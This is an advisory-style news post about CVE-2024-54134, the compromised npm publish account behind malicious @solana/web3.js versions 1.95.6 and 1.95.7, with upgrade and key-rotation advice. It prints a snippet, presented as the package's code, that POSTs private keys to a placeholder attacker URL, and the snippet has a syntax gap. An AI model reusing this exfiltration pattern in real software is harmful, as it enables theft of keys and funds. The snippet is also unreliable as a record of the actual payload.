CVE CyberSecurity Database News

CVE-2024-54134: Compromised Publish-Access Account for @solana/web3.js Library Leads to Unauthorized and Malicious Packages

Poster -

Description: In this post, we will discuss the recent compromise of a publish-access account for the @solana/web3.js library, which led to the publication of unauthorized and malicious packages capable of stealing private keys and draining funds from affected dapps. We will provide code snippets, links to original references, and details on the exploit itself, as well as the steps you should take to protect your Solana app.

The Compromise

On Tuesday, December 3, 2024, between 3:20pm UTC and 8:25pm UTC, an attacker gained access to a publish-access account for the @solana/web3.js library. This JavaScript library is widely used by Solana dapps, and the attacker was able to publish two unauthorized and malicious versions (1.95.6 and 1.95.7) during this time window.

These packages were modified to contain malicious code allowing the attacker to steal private key material and drain funds from dapps handling private keys directly, such as bots. The issue does not affect non-custodial wallets, as they do not expose private keys during transactions.

This compromise is *not* an issue with the Solana protocol itself but rather with a specific JavaScript client library. It only affects projects that directly handle private keys and that updated to the affected versions within the specified time window.

Code Snippet of Affected Package Version

if (this._privateKey && this._privateKey.length > ) {
  const privateKeyString = this._privateKey.toString('base64');
  const decodedPrivateKey = atob(privateKeyString);
  try {
    const attackerKey = 'attackerPublicKey';
    const url = '<attackerURL>';
    fetch(url, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ privateKey: decodedPrivateKey, attackerKey }),
    });
  } catch (error) {
    console.error('Failed to send private key to the attacker:', error);
  }
}

Detection and Mitigation

The unauthorized versions (1.95.6 and 1.95.7) were detected within hours and have been unpublished since. All Solana app developers should immediately upgrade to version 1.95.8:

npm install @solana/web3.js@1.95.8

If you suspect your app might have been compromised, you should rotate any suspect authority keys, including multisigs, program authorities, server keypairs, and so on.

References

- Original Solana GitHub Issue
- Solana Incident Response Report
- 1.95.8 Patch Release Notes

Exploit Details

The attacker modified the @solana/web3.js package to include the code shown above, which sends the user's private key to a specified attacker-controlled URL. Once the attacker has the private key, they can drain funds from affected dapps.

Conclusion

This CVE-2024-54134 compromise of a publish-access account for the @solana/web3.js library highlights the importance of proper access controls and monitoring for third-party packages. It serves as a reminder to always verify the integrity of the packages you're using and to keep an eye on your dependencies. By following the provided mitigation steps, affected Solana projects can safeguard their funds and keep their dapps secure.

Timeline

Published on: 12/04/2024 16:15:26 UTC